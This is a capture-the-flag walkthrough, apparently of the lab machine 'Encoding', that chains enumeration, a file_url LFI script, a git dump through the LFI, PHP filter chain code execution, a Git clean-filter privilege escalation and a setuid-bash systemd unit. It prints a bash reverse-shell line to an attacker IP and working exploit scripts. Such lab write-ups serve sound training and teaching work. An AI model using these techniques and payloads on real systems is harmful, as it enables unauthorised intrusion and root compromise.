# Encoding!

## @Author : M3tr1c_r00t

![Encoding](https://user-images.githubusercontent.com/99975622/228976135-f49f41d4-142f-489e-baf9-33f2d8e5aa17.png)

### Enumeration...

#### nmap

```
# Nmap 7.93 scan initiated Sat Jan 28 22:34:45 2023 as: nmap -sC -sV -A -p 22,80 -oN nmapports.txt 10.129.12.218
Nmap scan report for 10.129.12.218
Host is up (0.23s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 4fe3a667a227f9118dc30ed773a02c28 (ECDSA)
|_  256 816e78766b8aea7d1babd436b7f8ecc4 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-server-header: Apache/2.4.52 (Ubuntu)
|_http-title: HaxTables
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.15 - 5.6 (95%), Linux 5.0 - 5.3 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 5.3 - 5.4 (94%), Linux 2.6.32 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 5.4 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   231.62 ms 10.10.14.1
2   231.76 ms 10.129.12.218

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 28 22:35:06 2023 -- 1 IP address (1 host up) scanned in 22.22 seconds
```

#### Gobuster...

```
/.hta                 (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/assets               (Status: 301) [Size: 315] [--> http://haxtables.htb/assets/]
/includes             (Status: 301) [Size: 317] [--> http://haxtables.htb/includes/]
/index.php            (Status: 200) [Size: 1999]
/server-status        (Status: 403) [Size: 278]
```

The redirects point at `haxtables.htb`, so that name (and the subdomains found later) goes into `/etc/hosts`.

### Foothold...

This seems to be a site which we can use to do various data conversions.
![Screenshot from 2023-03-30 22-49-57](https://user-images.githubusercontent.com/99975622/228978149-ba4e23dd-2f12-459f-b061-9e08052240bf.png)

If we visit the api page, we can see how to use the python `requests` module to do the conversions through the api subdomain of the website.

![Screenshot from 2023-03-30 22-49-13](https://user-images.githubusercontent.com/99975622/228978618-3f362b5a-ea3c-4ed8-aff9-4da1b44674b4.png)

We can also do a sub-domain enumeration.

![Screenshot from 2023-03-30 14-31-05](https://user-images.githubusercontent.com/99975622/228978761-8566ae83-e6c2-4127-8cfc-edc9820f6923.png)

The request for converting strings to hex does not have to carry the string itself: it can take a `file_url`, which the server fetches on our behalf, and the `file://` scheme is accepted. That gives us an LFI (the file comes back hex-encoded, so we just decode it), and I wrote a small script for it.

In the sub-domain enumeration above there was a subdomain, `image`, which we had no access to. With the LFI we can read its contents anyway, starting with the index page.

![Screenshot from 2023-03-30 14-31-39](https://user-images.githubusercontent.com/99975622/228979373-86fd5a12-2d15-4f7d-bd61-caf882a5c8a1.png)

In index.php we can see that the page requires a `util.php`, so we take a look at that too.

![Screenshot from 2023-03-30 14-32-06](https://user-images.githubusercontent.com/99975622/228979603-8dae2e48-a243-47ff-b69d-5ce76dd513d9.png)

From the exec function in util.php we can guess that there is a .git repository on this sub-domain. We can confirm it by reading `.git/HEAD` through the LFI.

![Screenshot from 2023-03-30 15-02-51](https://user-images.githubusercontent.com/99975622/228980337-d1e23200-b99a-4b68-bdeb-c09d0a5adc48.png)

It does indeed exist. Since we can't reach the .git directory through the website itself (permission issues), we can use the LFI script to read the repository's files instead. But there is a specific way in which dumper scripts do that: they read `HEAD`, follow it to the ref it points at, and then fetch the commit, tree and blob objects one at a time from `.git/objects/`, because each object is only discoverable from the hash stored in the object that references it.
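To make that walk concrete, here is an added example (not the writeup's script and not git-dumper itself) that performs it against a local `.git` directory through a single `fetch_path` function, which is the one piece you would swap for the LFI script. The repository it dumps is constructed inside `demo_git_dump`; the file names, paths and the function names are all made up for the demo.

```bash
#!/usr/bin/env bash
# Added example, not the writeup's code: the loop a git dumper runs when it can
# only read one path at a time.  The fetcher below copies from a local .git
# directory; against the box it would call the LFI script instead.

# fetch_path <source .git dir> <relative path> <destination .git dir>
# Swap this body for your own transport (curl, the LFI script, ...).  It must
# return non-zero when the path does not exist so the walk can skip it.
fetch_path() {
  local src=$1 rel=$2 dst=$3
  [ -f "$src/$rel" ] || return 1
  mkdir -p "$(dirname "$dst/$rel")"
  cp "$src/$rel" "$dst/$rel"
}

# dump_git <source .git dir> <destination work tree>
dump_git() {
  local src=$1 dst=$2 gitdir=$2/.git ref sha kind next
  local -a queue
  local -A seen
  # git only treats a directory as a repository if HEAD, objects/ and refs/ exist
  mkdir -p "$gitdir/objects" "$gitdir/refs"

  # 1. HEAD names the checked-out ref; the ref file holds the commit hash.
  fetch_path "$src" HEAD "$gitdir" || return 1
  ref=$(sed -n 's/^ref: //p' "$gitdir/HEAD")
  fetch_path "$src" "$ref" "$gitdir" || return 1
  queue=("$(cat "$gitdir/$ref")")

  # 2. Loose objects live at objects/<first 2 hex>/<remaining 38 hex>.  Fetch
  #    one, let git parse it, and enqueue every hash it references: a commit
  #    points at its tree (and parents), a tree at blobs and subtrees.  Blobs
  #    reference nothing, so the queue eventually drains.
  while [ ${#queue[@]} -gt 0 ]; do
    sha=${queue[0]}; queue=("${queue[@]:1}")
    [ -n "${seen[$sha]}" ] && continue
    seen[$sha]=1
    fetch_path "$src" "objects/${sha:0:2}/${sha:2}" "$gitdir" || continue
    kind=$(git --git-dir="$gitdir" cat-file -t "$sha")
    [ "$kind" = blob ] && continue
    for next in $(git --git-dir="$gitdir" cat-file -p "$sha" | grep -oE '[0-9a-f]{40}'); do
      queue+=("$next")
    done
  done

  # 3. With HEAD, the ref and the objects in place, git rebuilds the work tree.
  git --git-dir="$gitdir" --work-tree="$dst" reset -q --hard
}

# demo_git_dump: builds a throwaway source repo (constructed data), dumps it into
# a second directory and prints one recovered file.  A fresh repo has only loose
# objects; packed ones (objects/pack/*) need the pack and its index fetched too,
# which git-dumper handles and this demo does not.
demo_git_dump() {
  local src dst
  src=$(mktemp -d); dst=$(mktemp -d)
  git -C "$src" init -q
  mkdir -p "$src/actions"
  echo '<?php echo "handler";' > "$src/actions/action_handler.php"
  echo '<?php echo "index";' > "$src/index.php"
  git -C "$src" add -A
  git -C "$src" -c user.name=demo -c user.email=demo@example.invalid commit -q -m 'constructed demo commit'
  dump_git "$src/.git" "$dst"
  cat "$dst/actions/action_handler.php"
}
```

Source the file and run `demo_git_dump`. To aim it at a real target, replace the body of `fetch_path` with the LFI script (for example `python3 lfi.py "$rel" "$dst/$rel"`), which is exactly the substitution the writeup makes inside git-dumper.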
Since we can't start writing our very own git dumper from scratch, we can take the git-dumper bash script and modify it to fetch files through our LFI script. So, here is the python LFI script...

```
import requests
import sys

# Usage: python3 lfi.py <path under /var/www/image/.git> <local output file>
# The str2hex action fetches file_url server-side and returns the hex of its
# content, so a file:// URL reads an arbitrary local file.

def from_hex(data_json):
    return bytes.fromhex(data_json)


json_data = {
    'action': 'str2hex',
    'file_url': f'file:///var/www/image/.git/{sys.argv[1]}',
}

response = requests.post('http://api.haxtables.htb/v3/tools/string/index.php', json=json_data)

with open(sys.argv[2], "wb") as f:
    f.write(from_hex(response.json()['data']))
```

Modifying the gitdumper bash script... Look for the part of the script shown below, comment out the `curl` line and call the LFI script in its place, so that every file the dumper asks for is fetched through the LFI.

![image](https://user-images.githubusercontent.com/99975622/228982548-527f4233-e7aa-4070-98d1-5a20daaaf63b.png)

Executing the script...

![Screenshot from 2023-03-30 15-24-31](https://user-images.githubusercontent.com/99975622/228982833-7011a2a2-cf24-45a5-afc1-fb87a00f31e8.png)

Since I didn't find anything really helpful in the logs, we can check which files are present in the repository.

![Screenshot from 2023-03-30 16-42-00](https://user-images.githubusercontent.com/99975622/228983045-22e262f5-982f-4f6d-b9cb-2e3b768042ac.png)

We can see a really interesting file, ```actions/action_handler.php```. We can check it out.

![Screenshot from 2023-03-30 16-50-02](https://user-images.githubusercontent.com/99975622/228984033-5267ce44-a84f-40ce-b191-62cab9732c0d.png)

Contents...

![Screenshot from 2023-03-30 16-49-56](https://user-images.githubusercontent.com/99975622/228983475-c15f9f5c-6292-4616-a288-63c4c14f93de.png)

We can see a GET parameter that is used without any filtering, so this can be our entry point. We can use it together with a PHP filter chain (the `php://filter/convert.iconv...` chaining trick that generates arbitrary PHP code from an unfiltered include) to get command execution. First off, let's set up the request in Burp Suite. We can interpret the url request on the api page...
![Screenshot from 2023-03-30 20-25-37](https://user-images.githubusercontent.com/99975622/228984497-06668cfd-7772-4fa4-b5f8-37e16e37fb78.png)

Then let's set up our PHP filter chain payload and start the server...

![Screenshot from 2023-03-30 20-28-35](https://user-images.githubusercontent.com/99975622/228984873-bf0a407b-6773-4bde-b4a0-02f8deecf0c0.png)

Then send the payload as part of the url...

![Screenshot from 2023-03-30 20-28-45](https://user-images.githubusercontent.com/99975622/228985037-5328b4a2-27e7-4915-a0af-9480b61e7931.png)

In the URL, the target is written in the form of an email address, which is what gets the server to curl the request to the internal PHP script itself; then we give it the file location and the vulnerable parameter. And we get our reverse shell.

![Screenshot from 2023-03-30 20-29-03](https://user-images.githubusercontent.com/99975622/228985344-467f2796-5a43-4ea5-a21f-9594284a7368.png)

### www-data to user.

If we run `sudo -l`, we can see that we can run a script as the svc user. Looking at the script:

```
u=$(/usr/bin/git --git-dir=/var/www/image/.git --work-tree=/var/www/image ls-files -o --exclude-standard)
```

This line runs `git ls-files` with options to list all untracked files (`-o`) in the repository located in /var/www/image/.git, excluding any files that are ignored by Git (`--exclude-standard`). The output of this command is stored in the variable `$u`.

```
if [[ $u ]]; then
    /usr/bin/git --git-dir=/var/www/image/.git --work-tree=/var/www/image add -A
else
    /usr/bin/git --git-dir=/var/www/image/.git --work-tree=/var/www/image commit -m "Commited from API!" --author="james <james@haxtables.htb>" --no-verify
fi
```

This is an if statement that checks whether `$u` is not empty. If `$u` is not empty, there are untracked files in the repository, so the script runs `git add -A` to stage all changes (including deletions) for the next commit.
If `$u` is empty, there are no untracked files in the repository, so the script runs `git commit` with the commit message "Commited from API!", the author set to "james <james@haxtables.htb>", and `--no-verify`, which skips any pre-commit hooks configured in the repository. That rules out the obvious hook-based trick, but Git filters are not hooks, and `--no-verify` does nothing about them.

We can exploit this by planting our own Git configuration in the repository and turning the privileged `git add` into command execution.

#### access to user.

Make a file in /tmp called `rev`, add the following, and make the file executable.

```
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.56/9001 0>&1
```

Then run the following commands in the /var/www/image directory...

```
git init
echo '*.php filter=indent' > .git/info/attributes
git config filter.indent.clean /tmp/rev
sudo -u svc /var/www/image/scripts/git-commit.sh
```

Set up a listener before running the sudo command.

#### code explanation...

- `git init` - initializes a Git repository in the current directory (here it re-initializes the existing one, which is harmless and makes sure `.git/info` exists).
- `echo '*.php filter=indent' > .git/info/attributes` - creates the file `.git/info/attributes` with the line `*.php filter=indent`. This defines a Git attribute for files with a `.php` extension: the `filter=indent` part tells Git to pass those files through the filter named `indent` whenever it reads them into the index (the "clean" direction) or checks them out (the "smudge" direction).
- `git config filter.indent.clean /tmp/rev` - sets the clean command for the `indent` filter to /tmp/rev. Whenever Git stages a `.php` file that carries the attribute, it runs /tmp/rev with the file's contents on stdin.

So when the script runs as svc and finds untracked files, its `git add -A` stages the `.php` files, Git runs /tmp/rev as svc, and we get our shell. Note that the filter fires during `git add`, not during `git commit`, so the branch that matters is the `add -A` one; the script only takes it when `ls-files -o` prints something, so there must be an untracked file in the work tree (and a `.php` file that Git actually has to read). If that is not already the case, dropping an untracked `.php` file into /var/www/image before running the sudo command guarantees it.

![Screenshot from 2023-03-30 22-23-20](https://user-images.githubusercontent.com/99975622/228986381-058638cf-a7ae-40b7-966d-cebo2ef6dc8f.png)

And we get access as svc user.
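The whole chain can be checked in a throwaway repository before touching the target. The following is an added example, not the writeup's commands: it plants the same attribute and filter config, drops an untracked `.php` file, runs the same `git add -A` the privileged script runs (here as ourselves), and reports whether the filter executed. The marker file stands in for the reverse shell; the file and script names are made up for the demo.

```bash
#!/usr/bin/env bash
# Added example (not from the writeup): why "git add -A" run by a privileged
# script is enough to execute a "clean" filter configured by a low-privileged
# user.  Everything here is constructed for the demo.

# demo_clean_filter: returns 0 if the clean filter ran during "git add -A".
demo_clean_filter() {
  local repo marker
  repo=$(mktemp -d)
  marker=$repo/filter-ran
  git -C "$repo" init -q
  mkdir -p "$repo/.git/info"

  # The "clean" program.  Git pipes the file into it on stdin and stores what
  # it writes to stdout, so it passes the content through with "cat"; anything
  # else it does (touch a marker here, open a reverse shell in the writeup) is
  # a side effect that runs as whoever invoked git.
  cat > "$repo/clean.sh" <<EOF
#!/bin/bash
touch "$marker"
cat
EOF

  # Same two knobs as the writeup: the attribute mapping *.php to a filter, and
  # the filter's clean command.  Both live under .git/, so write access to the
  # repository (not sudo) is all that is needed to plant them.
  echo '*.php filter=indent' > "$repo/.git/info/attributes"
  git -C "$repo" config filter.indent.clean "bash $repo/clean.sh"

  # An untracked .php file must exist: git-commit.sh only takes the "add -A"
  # branch when "ls-files -o" prints something, and the clean filter only runs
  # for files git actually reads into the index.
  echo '<?php echo "hi";' > "$repo/index.php"

  # The line the privileged script runs (here under our own user).
  git --git-dir="$repo/.git" --work-tree="$repo" add -A

  [ -e "$marker" ]
}
```

Source the file and run `demo_clean_filter && echo filter ran`. On the box the only differences are that the clean command is `/tmp/rev` and that `git add -A` is executed by svc through the sudo-allowed script, so the side effect runs as svc.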
![Screenshot from 2023-03-30 22-24-01](https://user-images.githubusercontent.com/99975622/228986479-fd7ed570-8d03-4a7a-9298-b72c8a498c4c.png)

### user to root.

I created an ssh key pair and uploaded it to the machine so that I could log in with ssh.

![Screenshot from 2023-03-30 22-28-53](https://user-images.githubusercontent.com/99975622/228986690-7ccbb38b-b6ce-441a-ae67-2d500f06585e.png)

If we run `sudo -l` on the machine, we can see that we can run ```/usr/bin/systemctl restart *``` as root.

![Screenshot from 2023-03-30 22-29-07](https://user-images.githubusercontent.com/99975622/228986926-2c70c0c2-810f-4c42-a784-1eb4d1663216.png)

```
https://linuxhandbook.com/create-systemd-services/
https://medium.com/@benmorel/creating-a-linux-service-with-systemd-611b5c8b91d6
```

With `systemctl restart` we can make systemd execute a service of our choosing as root. For priv esc we can write a malicious unit whose command makes the /bin/bash binary setuid root, and then restart that unit. Unit files are usually stored in /etc/systemd/system. If we check the permissions, the normal `rwx` bits give us no write permission, only read and execute.

![Screenshot from 2023-03-30 22-35-16](https://user-images.githubusercontent.com/99975622/228987746-772fb844-b3ca-4527-bd1b-823820b2d32f.png)

If you look keenly, there is a ```+``` sign after the permission bits. It indicates that the directory carries additional permissions in the form of an ACL (Access Control List), which `ls -l` cannot show. We can read them with the ```getfacl``` command.

![Screenshot from 2023-03-30 22-43-55](https://user-images.githubusercontent.com/99975622/228988105-fab15036-ad30-41ef-a0d4-d0eb7db24eae.png)

And we can see that the ACL grants our user write permission on the directory (the `mask` entry is what caps how much of an ACL entry is effective). We can't modify the existing, root-owned unit files, but creating a new file in the directory works, for example with `echo` and a redirect. So we can save our own malicious service there and restart it.
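As an added example (not the unit from the writeup's screenshot), this is the kind of service file that does the job, written by a small function so it can be generated into a scratch directory and inspected first. The unit name `suid-bash.service` and the function name are made up here; on the box the target directory is `/etc/systemd/system`.

```bash
#!/usr/bin/env bash
# Added example, not the writeup's exact unit: a one-shot service that makes
# /bin/bash setuid-root.  The name "suid-bash.service" is made up for the demo.

# write_suid_unit [directory]: writes <directory>/suid-bash.service (default
# /etc/systemd/system) and prints the path of the unit it wrote.
write_suid_unit() {
  local dir=${1:-/etc/systemd/system} unit
  unit=$dir/suid-bash.service
  # The ACL lets us create a new file here, while the existing root-owned units
  # stay untouchable, so the payload is a unit of our own.  Type=oneshot means
  # "restart" just runs the command once and reports the exit status.
  cat > "$unit" <<'EOF'
[Unit]
Description=constructed demo unit (setuid /bin/bash)

[Service]
Type=oneshot
ExecStart=/bin/chmod u+s /bin/bash
EOF
  echo "$unit"
}
```

On the target: `write_suid_unit` (or the equivalent `echo`/`cat` redirect), then `sudo /usr/bin/systemctl restart suid-bash.service`. No `daemon-reload` is needed for a unit systemd has never loaded, which matters because the sudo rule only covers `restart`. Check with `ls -l /bin/bash` for the `s` in the owner bits, then run `bash -p`: without `-p` bash drops the effective uid back to your own.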
![Screenshot from 2023-03-30 22-45-30](https://user-images.githubusercontent.com/99975622/228988494-751d2ee0-5d49-4125-b35c-2b6a791575c0.png)

And we are root!

![Screenshot from 2023-03-30 22-45-40](https://user-images.githubusercontent.com/99975622/228988588-ef40abf8-f549-49f3-a6cd-6bbbcf2f58a9.png)

And Done!

![Screenshot from 2023-03-30 22-45-46](https://user-images.githubusercontent.com/99975622/228988643-5b2fe7e6-688e-47cb-94b2-ea8137fa5227.png)

### Socials

@instagram : https://instagram.com/Metric_r00t <br>@Twitter : https://twitter.com/M3tr1c_r00t